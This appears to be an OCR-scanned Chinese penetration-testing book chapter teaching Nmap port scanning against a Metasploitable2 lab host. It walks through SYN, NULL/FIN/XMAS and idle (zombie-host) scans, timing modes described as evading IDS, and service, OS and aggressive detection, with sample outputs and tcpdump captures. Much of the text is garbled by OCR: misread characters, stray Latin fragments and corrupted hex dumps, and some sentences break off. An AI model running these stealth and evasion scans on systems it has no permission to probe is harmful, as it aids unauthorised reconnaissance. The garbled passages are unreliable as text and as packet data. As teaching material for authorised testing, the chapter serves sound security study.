最 新 版 本 的 Namp 程序 ， 您 可 使 用 下 述 指令 。 

apt-get Update 


apt-get install nmap 

在 控制 台 终 端 启动 Nmap 的 指令 如 下 。 

nmap 

上 述 命 令 将 显示 该 程序 的 所 有 可 选项 及 使 用 说 明 。 刚 刚 接触 Nmap 
的 新 手 可 能 会 因为 信息 量 太 大 而 觉得 无 从 下 手 。 

邓 运 的 是 ， 您 仅 需 指定 一 个 参数 即 可 启动 扫描 。 这 个 参数 就 是 目 
标 主 机 的 IP 地 址 或 主机 名 称 (如 果 要 使 用 主机 名 称 ， 您 首先 需要 给 您 
的 主机 配置 一 个 能 够 解析 它 的 DNS 服务 器 ) 。 例 如 ， 您 可 以 使 用 下 述 


KA 
ES 


nmap 192.168.56.103 

在 没有 指定 其 他 选项 的 情况 下 ， 上 述 指 令 的 输出 结果 如 下 。 
Nmap scan report for 192.168.56.103 

Host is up (0.0046s latency). 


Not shown: 977 closed ports 
PORT STATE SERVICE 
21/tcp open ftp 

22/tcp open ssh 

23/tcp open telnet 

25/tcp open smtp 

53/tcp open domain 
80/tcp open http 

111/tcp open rpcbind 
139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
512/tcp open exec 

513/tcp open login 
514/tcp open shell 
1099/tcp open rmiregistry 
1524/tcp open ingreslock 
2049/tcp open nfs 
2121/tcp open ccproxy-ftp 
3306/tcp open mysql 
5432/tcp open postgresql 
5900/tcp open vnc 
6000/tcp open X11 
6667/tcp open irc 


8009/tcp open ajp13 

8180/tcp open unknown 

MAC Address: 08:00:27:43:15:18 (Cadmus Computer Systems) 

Nmap done: 1 IP address (1 host up) scanned in 13.49 seconds 

上 述 结 采 表 明 目 标 主 机 开放 了 很 多 端口 。 我 们 可 以 依 此 判断 它 容 

在 继续 演示 Nmap 之 前 ， 我 们 介绍 一 下 Nmap 可 以 识别 出 的 6 种 端口 
状态 。 这 6 种 疹 口 状态 如 下 。 

e 开放 : 工作 于 开放 端口 的 服务 器 端的 应 用 程序 可 以 受理 TCP 连 
接 、 接 收 UDP 数据 包 或 者 响应 SCTP 〈 流 控制 传输 协议 ) 请 求 。 

e XH]: 虽然 我 们 确实 可 以 访问 有 关 的 端口 ， 但 是 没有 应 用 程序 工 
作 于 该 端口 上 。 

e 过 滤 : Nmap 不 能 确定 该 器 口 是 否 开放 。 包 过 滤 设 备 屏 殴 了 我 们 
向 目标 发 送 的 探测 包 。 

e KIE: 虽然 可 以 访问 到 指定 闹 口 ， 但 Nmap 不 能 确定 该 端口 是 
否 处 于 开放 状态 。 

e 打开 | 过 滤 : Nmap 认为 指定 端口 处 于 开放 状态 或 过 滤 状 态 ， 但 
是 不 能 确定 处 于 两 者 之 中 的 哪 种 状态 。 在 遇 到 没有 吊 应 的 开放 闪 口 
时 ，Nmap 会 作出 这 种 判断 。 这 可 以 是 由 于 防火 墙 丢 弃 数 据 包 造成 的 。 

e 关闭 | 过 滤 : Nmap 认为 指定 端口 处 于 关闭 状态 或 过 滤 状 态 ， 但 
是 不 能 确定 处 于 两 者 之 中 的 哪 种 状态 。 

介绍 了 端口 状态 之 后 ， 下 面 将 介绍 几 个 在 渗透 测试 中 常用 的 Nmap 
选项 。 而 后 ， 我 们 将 进行 实际 演示 。 

1. 指定 扫 搬 日 标 

Nmap 把 指令 中 选项 和 参数 以 外 的 内 容 均 当 作 上 日 标 主机 来 处 理 。 我 
们 建议 您 以 主机 IP 地 址 而 非 主 机 名 的 形式 指定 目标 主机 。 以 IP 地 址 的 


形式 指定 目标 主机 ，Nmap 就 人 不必 在 扫 摘 之 前 进行 DNS 解 析 ， 这 样 可 以 
提高 端口 扫描 的 速度 。 

您 可 以 以 下 述 几 种 形式 ， 为 当前 版 本 的 Nmap 指 定 扫描 目标 的 IPv4 
地 址 。 

e 单个 主机 ， 如 192.168.0.1。 

e 以 CIDR 标记 法 表示 的 地 址 相连 的 整个 网 段 。 例 如 ， 
192.168.0.0/24 表示 从 192.168.0.0 到 192.168.0.255 的 256 个 了 地 址 。 

e 十 进 制 的 人 P 区 间 。 例 如 ，192.168.2-4,6.1 表示 4 个 全 地 址 : 
192.168.2.1、192.168.3.1、192.168.4.1 和 192.168.6.1。 

e 多 个 主机 目标 ， 如 192.168.2.1 172.168.3-5,9.1 ° 

Nmap 仅 支持 标准 格式 的 IPv6 地 址 和 以 主机 名 方式 指定 的 IPv6 主 机 
地 址 e 

除了 可 在 命令 行 里 指定 目标 主机 以 外 ， 您 还 可 以 指定 -让 
<inputfilename> 选 项 ， 令 Nmap 程序 从 指定 的 文本 文件 中 读 取 目标 主机 
的 清单 。 当 需要 从 其 他 程序 的 运行 结果 里 导出 IP 地 址 给 Nmap 使 用 时 ， 
这 个 功能 就 十 分 有 用 。 

务必 确保 文件 采用 的 是 Nmap 文 持 的 指定 格式 。 即 ， 使 用 空格 、 
制 表 符 或 换行 符号 间隔 不 同 的 目标 主机 。 

举例 来 说 ， 目 标清 单 文 件 可 以 如 下 所 示 。 

192.168.1.1-254 

192.168.2.1-254 

现在 ， 我 们 开始 扫描 192.168.56.0/24 这 个 网 段 。 另 外 ， 我 们 需要 使 
用 数据 包 捕获 (监听 ) 工具 观察 Nmap 发 送 的 数据 包 。 此 时 可 以 使 用 
tcpdump 程 序 。 

我 们 可 以 打开 终端 窗口 ， 然 后 使 用 下 述 指令 。 

tcpdump -nnX tcp and host 192.168.56.102 


在 本 例 中 ，192.168.56.102 是 运行 Nmap 程 序 的 主机 的 IP 地 址 。 请 根 
据 您 的 实际 情况 进行 相应 调整 。 
现在 新 建 一 个 终端 窗口 ， 然 后 并 执行 下 述 命令 。 
nmap 192.168.56.0/24 
tcpdump 终 端 窗 口 会 显示 捕获 的 数据 包 。 
22:42:12.107532 IP 192.168.56.102.49270 > 192.168.56.103.23: 
Flags [S], seq 239440322, win 1024, options [mss 1460], length 0 
0x0000: 4500 002c eb7f 0000 3006 ad2e c0a8 3866 E..,....0.....8f 
0x0010: c0a8 3867 c076 0017 0e45 91c2 0000 0000 ..8g.v...E....... 
0x0020: 6002 0400 4173 0000 0204 05b4 (MENS mu: 
根据 以 上 信息 ， 我 们 知道 实施 扫描 的 主机 从 49270 端 口 向 目标 主机 
的 23 端 口 (telnet) 发 送 了 含有 SYN 标识 位 的 数据 包 。 默 认 情 况 下 ， 在 
Kali Linux 里 以 特权 用 户 (如 root) 身份 启动 Nmap 后 ， 程 序 发 送 的 数据 
包 都 会 设 有 SYN 标 识 位 。 
tcpdump 程 序 还 会 收集 实施 扫描 的 主机 发 送 的 其 他 数据 包 〈 见 图 
6.3) 。 


22:31:01.766788 IP 192.168.56.102.39755 > 192.168.56.101.22939: Flags [S], seq 340921615, 
win 1024, options [mss 1460], length 0 

0x0000: 4500 002c 1714 0000 3506 7c9c c0a8 3866 E..,.... ou «ss dT 

0x0010: c@a8 3865 9b4b 599b 1452 OdOf 0000 0000 ..8e.KY..R...... 

0x0020: 6002 0400 8bc2 0000 6204 Q5b4 9 aan aed (wi tars a 
22:31:01.769945 IP 192.168.56.102.39754 > 192.168.56.100.1216: Flags [S], seq 340987150, 
in 1024, options [mss 1460], length 0 

0x0000: 4500 002c 40b8 0000 3406 53f9 cOa8 3866 E..,@...4.S...8f 


0x0010: c@a8 3864 9b4a 04cO 1453 OdOe 0000 0000 ..8d.J...S...... 
0x0020: 6002 0400 e09f 0000 0204 05b4 XT ee 
22:31:01.777222 IP 192.168.56.102.39755 » 192.168.56.100.22939: Flags [S], seq 340921615, 
win 1024, options [mss 1460], length 0 
0x0000: 4500 002c e034 0000 3b06 ad7c c0a8 3866 E..,.4..;..|..8f 
0x0010: cOa8 3864 9b4b 599b 1452 OdOf 0000 0000  ..8d.KY..R...... 
0x0020: 6002 0400 8bc3 0000 0204 05b4 Taichi a aid NR 
22:31:01.786871 IP 192.168.56.102.39755 » 192.168.56.101.99: Flags [S], seq 340921615, win 
1024, options [mss 1460], length O 
0x0000: 4500 002c c6cl 0000 3106 dOee cOa8 3866 E..,.... dh xx 8f 
0x0010: cGa8 3865 9b4b 0063 1452 OdOf 0000 0000 ..8e.K.c.R...... 
: 6002 0400 e4fa 0000 6204 Q5b4 Sa alt ar gari cg 


图 6.3 
目标 主机 可 能 会 回复 的 下 述 响应 信息 。 


22:36:19.939881 IP 192.168.56.103.1720 > 192.168.56.102.47823: 
Flags [R.], seq 0, ack 1053563675, win 0, length 0 
0x0000: 4500 0028 0000 4000 4006 48b2 c0a8 3867 E. 
(..@.@.H...8g 
0x0010: c0a8 3866 06b8 bacf 0000 0000 3ecc 1b1b ..8f........ Sini 
0x0020: 5014 0000 a243 0000 0000 0000 0000 p ou 
请 注意 : 上 壕 报 头 文 含有 R (Brese | 重 置 | ) 标识 。 也 就 是 说 ， 
日 标 主机 的 1720 闹 口 处 于 关闭 状态 。 我 们 可 以 根据 Nmap 的 扫 拉 结果 验 
证 这 个 判断 。 
但 是 ， 如 采 疹 口 处 于 开放 状态 ， 您 看 到 的 网 络 流量 则 会 大 体 如 


Te 
22:42:12.108741 IP 192.168.56.103.23 » 192.168.56.102.49270: 
Flags [S.], seq 1611132106, ack 239440323, win 5840, 
options [mss 1460], length 0 
0x0000: 4500 002c 0000 4000 4006 48ae c0a8 3867 
E..,..@.@.H...8g 
0x0010: c0a8 3866 0017 c076 6007 ecca 0e45 91c3 ..8f...v'....E.. 
0x0020: 6012 16d0 e1bf 0000 0204 05b4 0000 
从 中 可 以 看 出 ， 这 个 数据 包 确 认 了 前 一 个 数据 包 的 序列 号 。 前 一 
个 数据 包 的 序列 号 是 239440322， 这 个 数据 包 的 确认 号 是 239440323。 
2. TCP 扫描 选 项 
只 有 操作 系统 的 高 权限 用 户 ( UNIX 环境 下 的 root 级 别 用 户 或 者 
Windows 下 的 administrator 级 别 用户 ) 才能 使 用 Nmap 多 数 选 项 。 程 序 需 
要 相应 的 权限 才能 发 送 和 接收 原始 数据 包 。 默 认 情 况 下 ，Nmap 会 采用 
TCP SYN 扫描 。 在 权限 不 足 的 情况 下 ，Nmap HITTE RHI o R 
体 来 说 ，Nmap 程 序 文 持 的 扫描 方式 分 别 如 下 。 


e TCP 连接 扫描 CST) : 指定 这 个 选项 后 ， 程 序 将 和 目标 主机 的 
每 个 端口 都 进行 完整 的 三 次 握手 。 如 果 成 功 建立 连接 ， 则 判定 该 端口 
是 开放 端口 。 由 于 在 检测 每 个 端口 时 都 需要 进行 三 次 握手 ， 所 以 这 种 
扫描 方式 比较 慢 ， 而 且 扫 摘 行为 很 可 能 被 目标 主机 记录 下 来 。 如 采 局 
动 Nmap 的 用 户 的 权限 不 足 ， 那 么 默认 情况 下 Nmap 程 序 将 以 这 种 模式 
进行 扫描 。 

eSYN 扫描 (-sS) : 该 选项 也 称 为 半 开 连接 或 者 SYN stealth。 采 
用 该 选项 后 ，Nmap 将 使 用 含有 SYN 标 志 位 的 数据 包 进 行 端口 探测 。 如 
果 目 标 主机 回复 了 SYN/ACK 包 ， 则 说 明 该 端口 处 于 开放 状态 ， 如 果 回 
复 的 是 RST/ACK 包 ， 则 说 明 这 个 端口 处 于 天 闭 状态 ; 如 果 没 有 任何 啊 
应 或 者 发 送 了 ICMP unreachable E, WAU Aik ym DTE I o 
SYN 模 式 的 扫描 速度 非常 好 。 而 且 由 于 这 种 模式 不 会 进行 三 次 握手 ， 
所 以 是 一 种 十 分 隐蔽 的 扫 摘 方式。 如果 启动 Nmap 的 用 户 有 高 级 别 权 
限 ， 那 么 在 默认 情况 下 Nmap 程 序 将 以 这 种 模式 进行 扫描 。 

e TCP NULL (-sN) ^ FIN (-sF) 及 XMAS (-sX) 扫描 : NULL 
扫描 不 设置 任何 控制 位 ，FIN 扫 描 仅 设置 FIN 标 志 位 : XMAS 
FIN、PSH 和 URG 的 标识 位 。 如 果 目 标 主机 返回 了 含有 RST 标识 位 的 
响应 数据 ， 则 说 明 该 端口 处 于 关闭 状态 ;如 果 目 标 主机 没有 任何 回 
应 ， 则 该 端口 处 于 打开 | 过 滤 状 态 。 

e TCP Maimon 扫 描 (-sM) : Uriel Maimon 首先 发 现 了 TCP 
Maimom 扫 摘 方式 。 这 种 模式 的 探测 数据 包含 有 FIN/ACK 标 识 。 对 于 
BSD 衍 生出 来 的 各 种 操作 系统 来 说 ， 如 果 被 测 端口 处 于 开放 状态 ， 主 
机 将 会 丢弃 这 种 探测 数据 包 ; 如 果 被 测 端 口 处 于 天 闭 状 态 ， 那 么 主机 
将 会 回复 RST 。 

e TCPACK 扫描 (-sA) : 这 种 扫描 模式 可 以 检测 目标 系统 
用 了 数据 包 状 态 监 测 技术 (stateful) 防火 墙 ， 并 能 确定 哪些 端 
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火 墙 屏 菩 。 这 种 类 型 的 数据 包 只 有 一 个 ACK 标 识 位 。 如 采 目 标 主机 的 
回复 中 含有 RST 标 识 ， 则 说 明 目 标 主 机 没有 被 过 滤 。 

e TCP 窗口 扫描 (-SW) : 这 种 扫描 方式 检测 目标 返回 的 RST 数 据 
包 的 TCP 窗 口 字 段 。 如 果 目 标 端口 处 于 开放 状态 ， 这 个 字段 的 值 将 是 正 
值 ， 否 则 它 的 值 应 当 是 0。 

e TCP Idle 扫描 (-sI) : 采用 这 种 技术 后 ， 您 将 通过 指定 的 僵尸 主 
机 发 送 扫 扩 数据 包 。 本 机 并 不 与 目标 主机 和 直接 通信 。 如 采 对 方 网 络 里 
有 IDS，IDS 将 认为 发 起 扫描 的 主机 是 僵尸 主机 。 

Nmap 的 scanflags 选 项 可 设 定 目 定 义 的 TCP 扫 摘 方 式 。 这 个 选项 的 
参数 可 以 用 数字 表示 〈 例 如 ，9 代 表 PSH 和 FIN 标 识 ) 。 这 个 选项 也 支 
持 标识 位 的 符号 缩写 。 在 使 用 符号 缩写 时 ， 仅 需要 将 URG、ACK、 
PSH ^ RST ^ SYN ^ FIN ^ ECE ^ CWR ` ALLAINONE ELTE $ Jl Fi 3:6 £3 
组 合 。 例 如 : --scanflags URGACKPSH 将 设置 URG、ACK 和 PSH 标识 
位 。 

3. UDP 扫描 选项 

Nmap 有 多 种 TCP 扫 描 方式 ， 而 UDP 扫描 仅 有 一 种 扫描 方式 (- 
sU) 。 虽 然 UDP 扫 描 结果 没有 TCP 扫 描 结果 的 可 靠 度 高 ， 但 渗透 测试 
人 员 不 能 因此 而 轻视 UDP 扫 描 ， 毕 况 UDP 端 口 代表 着 可 能 会 有 价值 的 
服务 端 程序 。 

UDP 扫 描 的 最 大 问题 吓 性 能 问题 。 由 干 Linux 内 核 限 制 1 秒 内 最 多 
发 送 一 次 ICMP Port Unreachable 信 息 。 按 照 这 个 速度 ， 对 一 台 主 机 的 
65536 个 UDP 端口 进行 完整 扫 摘 ， 总 耗 时 必定 会 超过 18 个 小 时 。 

改善 扫描 速度 的 方式 主要 有 : 

e 进行 并 发 的 UDP JJH; 

e 优先 扫描 利用 端口 ; 

e 在 防火 墙 后 面 扫描 ; 

e JA Hi --host-timeout 选项 以 跳 过 啊 应 过 慢 的 主机 。 


E, 


这 些 方法 能 够 减少 UDP 端口 扫描 所 需 的 总 体 时 间 。 
假如 我 们 需要 找到 目标 主机 开放 了 哪些 UDP 端口 。 为 提高 扫描 速 
我 们 仅 扫描 53 端 口 (DNS) 和 161 端 口 (SNMP) 。 此 时 需要 使 用 


下 述 指令 。 


口 进 


该 选 


nmap -sU 192.168.56.103 -p 53,161 

上 述 指令 的 返回 结 采 如 下 。 

Nmap scan report for 192.168.56.103 

Host is up (0.0016s latency). 

PORT STATE SERVICE 

53/udp open domain 

161/udp closed snmp 

4. 目标 端口 选项 

默认 情况 下 ，Nmap 将 从 每 个 协议 的 第 用 闻 口 中 随机 选择 1000 个 端 
行 扫 摘 。 其 nmap-services 文 件 对 端口 的 命中 率 进 行 了 排名 。 
如 需 更 改 端口 配置 ， 可 使 用 Nmap 的 以 下 几 个 选项 。 

e -p 端 口 范围 : 只 扫描 指定 的 端口 。 扫 描 1~ 全 1024 号 端口 ， 可 设 定 
项 为 -p 1-1024。 扫 描 1~“65535 端 口 时 ， 可 使 用 -p- 选 项 。 

e-F (快速 扫描 ) : 将 仅 扫 描 100 个 常用 端口 。 

e -r (顺序 扫描 ) : 指定 这 个 选项 后 ， 程 序 将 从 按照 从 小 到 大 的 顺 


序 扫描 端口 。 


O o 


e --top-ports «1 or greater>: 扫描 nmap-services 里 排名 前 N 的 端 
p 


以 NULL 方 式 扫描 目标 主机 的 22、25 端 口 的 指令 如 下 所 示 。 
nmap -SN -p 22,25 192.168.56.103 

上 述 指令 的 返回 结 采 如 下 。 

Nmap scan report for 192.168.56.103 

Host is up (0.00096s latency). 


PORT STATE SERVICE 
22/tcp open|filtered ssh 
25/tcp open|filtered smtp 
80/tcp open|filtered http 
3306/tcp open|filtered mysql 
MAC Address: 08:00:27:43:15:18 (Cadmus Computer Systems) 
Nmap done: 1 IP address (1 host up) scanned in 14.38 seconds 
tcpdump 捕 获 的 信息 如 下 。 
23:23:38.581818 IP 192.168.56.102.61870 > 192.168.56.103.22: Flags 
[], win 1024, length 0 
0x0000: 4500 0028 06e4 0000 2f06 92ce c0a8 3866 E..(.../.....8f 
0x0010: c0a8 3867 f1ae 0016 dd9e bf90 0000 0000 ..8g............ 
0x0020: 5000 0400 2ad2 0000 intus 
23:23:38.581866 IP 192.168.56.102.61870 > 192.168.56.103.25: Flags 
[], win 1024, length 0 
0x0000: 4500 0028 1117 0000 3106 869b c0a8 3866 E..(....1.....8f 
0x0010: c0a8 3867 f1ae 0019 dd9e bf90 0000 0000 ..8g............ 
0x0020: 5000 0400 2acf 0000 Tom 
23:23:39.683483 IP 192.168.56.102.61871 > 192.168.56.103.25: Flags 
[], win 1024, length 0 
0x0000: 4500 0028 afaf 0000 2706 £202 c0a8 3866 E..(....'.....8f 
0x0010: c0a8 3867 flaf 0019 dd9f bf91 0000 0000 ..8g............ 
0x0020: 5000 0400 2acc 0000 ae 
23:23:39.683731 IP 192.168.56.102.61871 > 192.168.56.103.22: Flags 
[], win 1024, length 0 
0x0000: 4500 0028 5488 0000 3506 3f2a c0a8 3866 E..(T...5.?*..8f 
0x0010: c0a8 3867 flaf 0016 dd9f bf91 0000 0000 ..8g............ 


0x0020: 5000 0400 2acf 0000 pone 

根据 以 上 信息 ， 我 们 可 以 得 出 下 述 结论 。 

e 第 1 个 数据 包 ， 是 实施 扫描 的 主机 检测 目标 主机 的 22 端口 状态 的 
数据 包 。 一 段 时 间 之 后 ， 它 发 出 了 第 2 个 数据 包 ， 检 测 目 标 主机 的 25 端 
O o 

e 第 3 个 数据 包 ， 是 实施 扫描 的 主机 检测 目标 主机 的 25 端口 状态 的 
数据 包 。 一 段 时 间 之 后 ， 它 发 出 了 第 4 个 数据 包 ， 检 测 目 标 主机 的 22 端 
O o 

e 过 了 一 段 时 间 之 后 ， 目 标 主 机 仍然 没有 进行 任何 响应 。Nmap 7l 
定 这 两 个 端口 处 于 开放 状态 或 过 滤 状 态 。 

5. 输出 选项 

Nmap 可 以 把 扫描 结果 保存 为 外 部 文件 。 在 需要 使 用 其 他 工具 处 理 
Nmap 的 扫描 结果 时 ， 这 一 功能 十 分 有 用 。 

即使 您 设 定 程序 把 扫描 结果 保存 为 文件 ，Nmap 还 是 会 在 屏幕 上 显 
zi 

Nmap 支 持 以 下 几 种 输出 形式 。 

e 交互 (屏幕 ) 输出 : Nmap 把 扫描 结果 发 送 到 标准 输出 设备 上 

(通常 为 终端 /控制 台 ) ， 这 是 默认 的 输出 方式 。 
e 正常 输出 (-oN) : 与 交互 输出 类 似 ， 但 是 不 显示 runtime 信息 和 


e XML 文件 (-oX) : 生成 的 XML 格式 文件 可 以 转换 成 HTML 
格式 文件 ， 还 可 被 Nmap 的 图 形 用 户 界 面 解 机 ， 也 便于 导入 数据 库 。 本 
文 建议 您 尽量 将 扫描 结果 输出 为 XML 文件 。 

e 生成 便于 Grep 使 用 的 文件 (-oG) : 虽然 这 种 文件 格式 已 经 过 
时 ， 但 仍然 很 受 欢迎 。 这 种 格式 的 文件 ， 其 内 容 由 注释 (由 # 开 始 ) 和 
信息 行 组 成 。 信 息 行 包公 6 个 字段 ， 每 个 字段 的 字段 名 称 和 字段 值 以 冒 
号 分 割 ， 字 段 之 间 使 用 制 表 符 阳 开 。 这 些 字段 的 名 称 分 别 为 Host ^ 


Ports ` Protocols ` Ignored State ` OS ` Seq Index ` IP ID Seq 和 Status ° 
这 种 格式 的 文件 便于 grep 或 awk 之 类 的 UNIX 指令 整理 扫描 结果 。 

还 可 以 通过 -oA 选项 ， 让 Nmap 程 序 把 扫描 结果 同时 以 三 种 形式 

(正常 输出 、XML 文 件 和 便于 Grep 使 用 的 文件 ) 进行 输出 。 

如 需 把 保存 扫描 结果 保存 为 XML 文件 (myscan.xml) ， 可 使 用 下 
述 指令 。 

nmap 192.168.56.103 -oX myscan.xml 

以 下 是 XML 文件 中 的 部 分 内 容 。 


<?xml version="1.0"?> 


<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" 
type="text/xs]"?> 
<!-- Nmap 6.25 scan initiated Sat Jul 20 23:50:25 2013 
as: nmap -oX myscan.xml 192.168.56.103 --> 
<nmaprun scanner="nmap" args="nmap -OX . myscan.xml 
192.168.56.103" 
start-" 1374339025" startstr-" Sat Jul 20 23:50:25 2013" 
version="6.25" xmloutputversion-" 1.04" 
«scaninfo type-"syn" protocol="tcp" numservices-" 1000" 
services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42 
<some port numbers are deleted for brevity> 
50003,50006,50300,50389,50500,50636,50800,51103,51493, 
52673,52822,52848,52869,54045,54328,55055- 
55056,55555,55600,56737 
56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64 
623, 
64680,65000,65129,65389"/> 


<verbose level="0"/> 


«debugging level="0"/> 
«host starttime="1374339025" endtime-"1374339038"» «status 
state-"up" reason-"arp-response" reason ttl-2"0"/^ 
«address addr="192.168.56.103" addrtype="ipv4"/> 
«address addr="08:00:27:43:15:18" addrtype-"mac" vendor-"Cadmus 
Computer Systems"/> 

因为 HTML 格式 的 文件 比 XML 格式 的 文件 更 易于 阅读 ， 所 以 我 
们 通常 会 把 XML 格式 文件 转换 成 HTML 格 式 文 件 。 我 们 可 使 用 xsltproc 
进行 这 种 格式 转换 。 该 程序 的 用 法 如 下 。 

xsltproc myscan.xml -o myscan.html 

使 用 Kali Linux 目 带 的 Iceweasel Web X) 53,281] JFiX SHTML 文件 

( 见 图 6.4) ° 

XML 的 处 理 程序 能 够 处 理 Nmap 生 成 的 XML 文件 。 很 多 编程 语言 
都 市 有 XML 通用 处 理 库 。 其 中 ， 下 述 几 种 语言 专门 开发 出 了 可 供 处 理 
Nmap XML 报告 的 库 。 

e Perl: Nmap-Parser (http://search.cpan.org/dist/Nmap-Parser/) ° 

e Python: python-nmap ( http://xael.org/norman/python/python- 
nmap/) ° 

e Ruby: Ruby Nmap (http://rubynmap.sourceforge.net/) ° 

e PowerShell: 专门 处 理 Nmap XML 格式 报告 的 PowerShell 脚 本 程 
FF (http://www. sans.org/windows-security/2009/06/11/powershell-script- 


toparse-nmap-xml-output) ° 


192.168.56.103 


Address 


e 192.168.56.103 (ipv4) 
e 08:00:27:43:15:18 - Cadmus Computer Systems (mac) 


Ports 


The 977 ports scanned but not shown below are in state: closed 


es 977 ports replied with: resets 


6. 时 间 排 程控 制 选项 

Nmap 可 通过 -TI 选项 指定 时 间 排 程控 制 的 模式 。 它 有 6 种 扫描 模 
式 . o 

e paranoid (0) : 每 5 分 钟 发 送 一 次 数据 包 ， 且 不 会 以 并 行 方式 同 
时 发 送 多 组 数据 。 这 种 模式 的 扫描 不 会 被 IDS 检 测 到 。 

e sneaky (1) : 每 隔 15 秒 发 送 一 个 数据 包 ， 且 不 会 以 并 行 方式 同 
时 发 送 多 组 数据 。 

e polite (2) : 每 0.4 秒 发 送 一 个 数据 包 ， 且 不 会 以 并 行 方式 同时 
发 送 多 组 数据 。 

e normal (3) : 此 模式 同时 间 多 个 目标 发 送 多 个 数据 包 ， 为 Nmap 
默认 的 模式 ， 该 模式 能 目 动 在 扫描 时 间 和 网 络 负 载 之 间 进 行 平衡 。 

e aggressive (4) : 在 这 种 模式 下 ，Nmap 对 每 个 既定 的 主机 只 扫 
描 5 分 钟 ， 然 后 扫描 下 一 台 主 机 。 它 等 竺 响应 的 时 间 不 超过 1.25 秒 。 

e insane (5) : 在 这 种 模式 下 ，Nmap 对 每 个 既定 的 主机 仅 扫描 75 
秒 ， 然 后 扫描 下 一 人 台 主 机 。 它 等 竺 响应 的 时 间 不 超过 0.3 秒 。 
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进行 更 隐匿 或 更 快速 的 扫描 ， 否 则 没有 必要 调整 这 一 选项 。 

7. 常用 选项 

本 市 将 讨论 Nmap 的 几 个 非常 有 用 的 选项 。 

服务 版 本 识别 

Nmap 程序 可 以 在 进行 端口 扫描 的 时 候 检测 服务 端 软件 的 版 本 信 
已。 版 本 信息 将 使 后 续 的 漏洞 识别 工作 更 有 针对 性 。 

如 需 局 用 这 一 功能 ， 就 要 指定 Nmap 的 -sV 选 项 。 

例如 ， 在 获取 目标 主机 22 端 口上 的 服务 程序 的 版 本 信息 时 ， 可 使 
FA Pxüd8 ° 

nmap -sV 192.168.56.103 -p 22 

上 述 指 令 的 返回 结 有 末 如 下 。 

Nmap scan report for 192.168.56.103 

Host is up (0.0016s latency). 

PORT STATE SERVICE VERSION 

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntul (protocol 2.0) 

EmA ARH: APNEA 22% L1 ABT JT CIS, EARS iE 
序 是 4.7p1 版 本 的 OpenSSH， 通 信 协 议 是 SSH 2.0 ° 

操作 系统 检测 

Nmap 还 能 识别 目标 主机 的 操作 系统 。 

如 需 启用 这 一 功能 ， 就 要 指定 Nmap 的 -O 选 项 。 

例如 ， 在 获取 目标 主机 的 操作 系统 信息 时 ， 可 使 用 下 述 指令 。 

nmap -O 192.168.56.103 

上 述 指令 的 返回 结 有 末 如 下 。 

Host is up (0.0037s latency). 


Not shown: 977 closed ports 
PORT STATE SERVICE 


21/tcp open ftp 

22/tcp open ssh 

23/tcp open telnet 

25/tcp open smtp 

53/tcp open domain 

80/tcp open http 

111/tcp open rpcbind 

139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
512/tcp open exec 

513/tcp open login 

514/tcp open shell 

1099/tcp open rmiregistry 
1524/tcp open ingreslock 
2049/tcp open nfs 

2121/tcp open ccproxy-ftp 
3306/tcp open mysql 
5432/tcp open postgresql 
5900/tcp open vnc 

6000/tcp open X11 

6667/tcp open irc 

8009/tcp open ajp13 
8180/tcp open unknown 
MAC Address: 08:00:27:43:15:18 (Cadmus Computer Systems) 
Device type: general purpose 
Running: Linux 2.6.X 

OS CPE: cpe:/o:linux:linux_kernel:2.6 


OS details: Linux 2.6.9 - 2.6.33 

Network Distance: 1 hop 

上 上述 信息 表明 ， 服 务 絮 使 用 的 是 基于 2.6.9-2.6.33 版 本 Linux 内 核 的 
Linux 系 统 。 如 果 这 个 Linux 内 核 上 存在 漏洞 ， 我 们 就 可 以 利用 这 些 沁 
ili] 

禁用 主机 检测 

如 果 主 机 屏 菩 了 ping 请 求 ，Nmap 可 能 会 认为 该 主机 没有 开机 。 这 
将 使 得 Nmap 无 法 进行 进一步 检测 ， 比 如 端口 扫描 、 服 务 版 本 识别 和 操 
作 系 统 识 别 等 探测 工作 。 为 了 克服 这 一 问题 ， 束 需要 禁用 Nmap 的 主机 
仿 测 功能 。 在 指定 这 个 选项 之 后 ，Nmap 会 认为 目标 主机 已 经 开机 并 会 
进行 全 套 的 检测 工作 。 

如 需 启用 这 一 功能 ， 就 要 指定 Nmap 的 -Pn 选项 。 

强力 检测 选项 

局 用 -A 选 项 之 后 ，Nmap 将 检测 目标 主机 的 下 述 信息 : 

e 服务 版 本 识别 CsV) ; 

e 操作 系统 识别 (-O) ; 

e 脚本 扫描 CsC) ; 

e Traceroute (--traceroute) ° 


这 种 扫 摘 类 型 的 扫 摘 时 间 较 长 。 举 例 来 说 ， 可 使 用 下 述 扫 摘 指 


d 


nmap -A 192.168.56.103 

上 述 指令 的 返回 结 有 末 如 下 。 

PORT STATE SERVICE VERSION 

21/tcp open ftp vsftpd 2.3.4 

| ftp-anon: Anonymous FTP login allowed (FTP code 230) 

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 
2.0) 


| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd 
(DSA) 

| 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 

|_http-methods: No Allow or Public header in OPTIONS response 
(status code 200) 

|_http-title: Metasploitable2 — Linux 


Host script results: 

| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: 
<unknown>, NetBIOS 

MAC: <unknown> 

| smb-os-discovery: 

| OS: Unix (Samba 3.0.20-Debian) 

| NetBIOS computer name: 

| Workgroup: WORKGROUP 

|_ System time: 2013-07-21T09:20:22-04:00 

TRACEROUTE 

HOP RTT ADDRESS 

1 1.66 ms 192.168.56.103 

8. 扫描 IPv6 主 机 

前 文 介绍 过 ，Nmap 能 够 扫描 IPv6 环 境 里 的 主机 ， 本 市 将 进行 细致 
说 明 。 

本 例 涉及 的 IP v6 地 址 如 下 。 

目标 主机 : fe80::a00:27ff:fe43:1518 

局 用 Nmap 的 -6 选项 即 可 扫描 IPv6 的 目标 主机 。 


当前 ， 您 只 能 逐个 指定 目标 主机 的 IPv6 地 址 。 举 例 来 说 ， 可 采用 
下 述 指令 扫描 IPv6 地 址 的 目标 主机 。 

nmap -6 fe80::a00:27ff:fe43:1518 

